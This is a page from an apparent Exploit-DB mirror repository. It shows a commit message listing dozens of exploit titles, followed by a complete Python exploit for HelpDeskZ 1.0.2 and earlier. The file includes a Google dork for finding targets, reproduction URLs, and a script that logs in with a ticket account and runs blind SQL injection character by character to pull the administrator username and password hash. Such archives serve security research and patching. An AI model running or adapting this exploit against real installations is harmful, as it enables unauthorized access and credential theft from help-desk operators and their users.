bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41200.py
Offensive Security bf6526a40b DB: 2017-01-31 
39 new exploits

OpenSSL 1.1.0 - Remote Client Denial of Service

CDRTools CDRecord 2.0 - Mandrake Privilege Escalation
CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation

RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit
RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation
BitchX 1.0c19 - Privilege Escalation (suid?)
Apache 1.3.31 (mod_include) - Local Buffer Overflow
BitchX 1.0c19 - Privilege Escalation
Apache 1.3.31 mod_include - Local Buffer Overflow

AIX 4.3/5.1 < 5.3 - lsmcode Command Execution Privilege Escalation
AIX 4.3/5.1 < 5.3 - 'lsmcode' Command Execution Privilege Escalation

Debian 2.2 - /usr/bin/pileup Privilege Escalation
Debian 2.2 /usr/bin/pileup - Privilege Escalation

Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation

GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow

Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow

IBM AIX 5.3 sp6 - ftp gets() Privilege Escalation
IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation

IBM AIX 5.3.0 - setlocale() Privilege Escalation
IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation

FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit
FreeBSD 6x/7 protosw Kernel - Privilege Escalation

PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit

HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow

(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - xattr Privilege Escalation
(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation

Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)
Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)

FreeBSD 6.4 - Netgraph Local Privilege Escalation Exploit
FreeBSD 6.4 - Netgraph Privilege Escalation

PHP 5.4.3 (Windows x86 Polish) - Code Execution

Apache (Mod_Auth_OpenID) - Session Stealing
Apache Mod_Auth_OpenID - Session Stealing

cPanel 5.0 - Openwebmail Privilege Escalation
cPanel 5.0 - 'Openwebmail' Privilege Escalation
Apache 2.0.4x (mod_php) - File Descriptor Leakage (1)
Apache 2.0.4x (mod_php) - File Descriptor Leakage (2)
Apache 2.0.4x mod_php - File Descriptor Leakage (1)
Apache 2.0.4x mod_php - File Descriptor Leakage (2)

Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3)
Apache 2.0.4x mod_perl - File Descriptor Leakage (3)

cPanel 5-9 - Privilege Escalation
cPanel 5 < 9 - Privilege Escalation

Apache 1.3.x (mod_include) - Local Buffer Overflow
Apache 1.3.x mod_include - Local Buffer Overflow

IBM AIX 5.x - Diag Privilege Escalation Vulnerabilities
IBM AIX 5.x - 'Diag' Privilege Escalation

Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation
Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation

Amanda 3.3.1 - amstar Command Injection Privilege Escalation
Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation
Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)
Deepin Linux 15 - lastore-daemon Privilege Escalation
Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)
Deepin Linux 15 - 'lastore-daemon' Privilege Escalation

Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)
Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)

Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)
Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)

Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)

Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation

Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)

Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)
Allwinner 3.4 Legacy Kernel - Privilege Escalation (Metasploit)

Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)

MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('mysql' System User) Privilege Escalation / Race Condition

MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation

Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)

Apache CouchDB 2.0.0 - Local Privilege Escalation
Apache CouchDB 2.0.0 - Privilege Escalation

Vesta Control Panel 0.9.8-16 - Local Privilege Escalation
Vesta Control Panel 0.9.8-16 - Privilege Escalation

Systemd 228 - Privilege Escalation (PoC)
Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Privilege Escalation (PoC)

Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)

Apache 1.3.x (mod_mylo) - Remote Code Execution
Apache 1.3.x mod_mylo - Remote Code Execution

Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure
Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure

Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit

Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit

Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow
Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow

3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow

Apache (mod_rewrite) 2.0.58 (Windows 2003) - Remote Overflow
Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow

Apache Tomcat Connector (mod_jk) - Remote Exploit (exec-shield)
Apache Tomcat Connector mod_jk - 'exec-shield' Remote Exploit

3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)

SapLPD 6.28 (Windows x86) - Remote Buffer Overflow

Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow

Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow
Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow

Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow

Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting
Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting

Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit
Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit

Apache (mod_proxy) - Reverse Proxy Exposure (PoC)
Apache mod_proxy - Reverse Proxy Exposure (PoC)

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit

Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting
Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting

Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass
Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass

Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass
Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass

Apache (mod_wsgi) - Information Disclosure
Apache mod_wsgi - Information Disclosure

Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit
Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution

phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit
phpGraphy 0.9.12 - Privilege Escalation / Commands Execution

PEAR 1.9.0 - Multiple Remote File Inclusion
PHP PEAR 1.9.0 - Multiple Remote File Inclusion

Pear HTTP_Upload 1.0.0b3 - Arbitrary File Upload
PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload

Radisys MRF - Command Injection
PHP PEAR 1.10.1 - Arbitrary File Download
Caregiver Script 2.57 - SQL Injection
Auction Script 6.49 - SQL Injection
Itech B2B Script 4.28 - SQL Injection
Itech Classifieds Script 7.27 - 'scat' Parameter SQL Injection
Itech Dating Script 3.26 - SQL Injection
Itech Freelancer Script 5.13 - SQL Injection
Itech Multi Vendor Script 6.49 - SQL Injection
Itech News Portal Script 6.28 - SQL Injection
Itech Real Estate Script 3.12 - SQL Injection
PHP Product Designer Script - Arbitrary File Upload
PHP Logo Designer Script - Arbitrary File Upload
Video Sharing Script 4.94 - SQL Injection
HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download
Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection
Itech Dating Script 3.26 - 'send_gift.php' SQL Injection
Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection
2017-01-31 05:01:15 +00:00

172 lines
No EOL
6.8 KiB
Python
Executable file
Raw Blame History

'''
# Exploit Title: HelpDeskZ <= v1.0.2 - Authenticated SQL Injection / Unauthorized file download
# Google Dork: intext:"Help Desk Software by HelpDeskZ", inurl:?v=submit_ticket
# Date: 2017-01-30
# Exploit Author: Mariusz Popławski, kontakt@deepsec.pl ( www.afine.pl )
# Vendor Homepage: http://www.helpdeskz.com/
# Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip
# Version: <= v1.0.2
# Tested on:
# CVE :
HelpDeskZ <= v1.0.2 suffers from an sql injection vulnerability that allow to retrieve administrator access data, and download unauthorized attachments.
Software after ticket submit allow to download attachment by entering following link:
http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket&param[]=2(VALID_TICKET_ID_HERE)&param[]=attachment&param[]=1&param[]=1(ATTACHMENT_ID_HERE)
FILE: view_tickets_controller.php
LINE 95: $attachment = $db->fetchRow("SELECT *, COUNT(id) AS total FROM ".TABLE_PREFIX."attachments WHERE id=".$db->real_escape_string($params[2])." AND ticket_id=".$params[0]." AND msg_id=".$params[3]);
third argument AND msg_id=".$params[3]; sent to fetchRow query with out any senitization
Steps to reproduce:
http://127.0.0.1/helpdeskz/?/?v=view_tickets&action=ticket&param[]=2(VALID_TICKET_ID_HERE)&param[]=attachment&param[]=1&param[]=1 or id>0 -- -
by entering a valid id of param[] which is our submited ticket id and adding our query on the end of request we are able to download any uploaded attachment.
Call this script with the base url of your HelpdeskZ-Installation and put your submited ticket login data (EMAIL, PASSWORD)
steps:
1. go to http://192.168.100.115/helpdesk/?v=submit_ticket
2. Submit a ticket with valid email (important we need password access).
3. Add attachment to our ticket (important step as the attachment table may be empty, we need at least 1 attachment in db to valid our query).
4. Get the password from email.
4. run script
root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk/ localhost@localhost.com password123
where http://192.168.100.115/helpdesk/ = base url to helpdesk
localhost@localhost.com = email which we use to submit the ticket
password123 = password that system sent to our email
Output of script:
root@kali:~/Desktop# python test.py http://192.168.100.115/helpdesk localhost@localhost.com password123
2017-01-30T09:50:16.426076 GET http://192.168.100.115/helpdesk
2017-01-30T09:50:16.429116 GET http://192.168.100.115/helpdesk/
2017-01-30T09:50:16.550654 POST http://192.168.100.115/helpdesk/?v=login
2017-01-30T09:50:16.575227 GET http://192.168.100.115/helpdesk/?v=view_tickets
2017-01-30T09:50:16.674929 GET http://192.168.100.115/helpdesk?v=view_tickets&action=ticket&param[]=6&param[]=attachment&param[]=1&param[]=1%20or%201=1%20and%20ascii(substr((SeLeCt%20table_name%20from%20information_schema.columns%20where%20table_name%20like%20'%staff'%20%20limit%200,1),1,1))%20=%20%2047%20--%20-
...
------------------------------------------
username: admin
password: sha256(53874ea55571329c04b6998d9c7772c9274d3781)
'''
import requests
import sys
if( len(sys.argv) < 3):
print "put proper data like in example, remember to open a ticket before.... "
print "python helpdesk.py http://192.168.43.162/helpdesk/ myemailtologin@gmail.com password123"
exit()
EMAIL = sys.argv[2]
PASSWORD = sys.argv[3]
URL = sys.argv[1]
def get_token(content):
token = content
if "csrfhash" not in token:
return "error"
token = token[token.find('csrfhash" value="'):len(token)]
if '" />' in token:
token = token[token.find('value="')+7:token.find('" />')]
else:
token = token[token.find('value="')+7:token.find('"/>')]
return token
def get_ticket_id(content):
ticketid = content
if "param[]=" not in ticketid:
return "error"
ticketid = ticketid[ticketid.find('param[]='):len(ticketid)]
ticketid = ticketid[8:ticketid.find('"')]
return ticketid
def main():
# Start a session so we can have persistant cookies
session = requests.session(config={'verbose': sys.stderr})
r = session.get(URL+"")
#GET THE TOKEN TO LOGIN
TOKEN = get_token(r.content)
if(TOKEN=="error"):
print "cannot find token"
exit();
#Data for login
login_data = {
'do': 'login',
'csrfhash': TOKEN,
'email': EMAIL,
'password': PASSWORD,
'btn': 'Login'
}
# Authenticate
r = session.post(URL+"/?v=login", data=login_data)
#GET ticketid
ticket_id = get_ticket_id(r.content)
if(ticket_id=="error"):
print "ticketid not found, open a ticket first"
exit()
target = URL +"?v=view_tickets&action=ticket&param[]="+ticket_id+"&param[]=attachment&param[]=1&param[]=1"
limit = 1
char = 47
prefix=[]
while(char!=123):
target_prefix = target+ " or 1=1 and ascii(substr((SeLeCt table_name from information_schema.columns where table_name like '%staff' limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -"
response = session.get(target_prefix).content
if "couldn't find" not in response:
prefix.append(char)
limit=limit+1
char=47
else:
char=char+1
table_prefix = ''.join(chr(i) for i in prefix)
table_prefix = table_prefix[0:table_prefix.find('staff')]
limit = 1
char = 47
admin_u=[]
while(char!=123):
target_username = target+ " or 1=1 and ascii(substr((SeLeCt username from "+table_prefix+"staff limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -"
response = session.get(target_username).content
if "couldn't find" not in response:
admin_u.append(char)
limit=limit+1
char=47
else:
char=char+1
limit = 1
char = 47
admin_pw=[]
while(char!=123):
target_password = target+ " or 1=1 and ascii(substr((SeLeCt password from "+table_prefix+"staff limit 0,1),"+str(limit)+",1)) = "+str(char)+" -- -"
response = session.get(target_password).content
if "couldn't find" not in response:
admin_pw.append(char)
limit=limit+1
char=47
else:
char=char+1
admin_username = ''.join(chr(i) for i in admin_u)
admin_password = ''.join(chr(i) for i in admin_pw)
print "------------------------------------------"
print "username: "+admin_username
print "password: sha256("+admin_password+")"
if admin_username=="" and admin_password=='':
print "Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_"
print "try to submit ticket with attachment"
if __name__ == '__main__':
main()
Reference in a new issue View git blame Copy permalink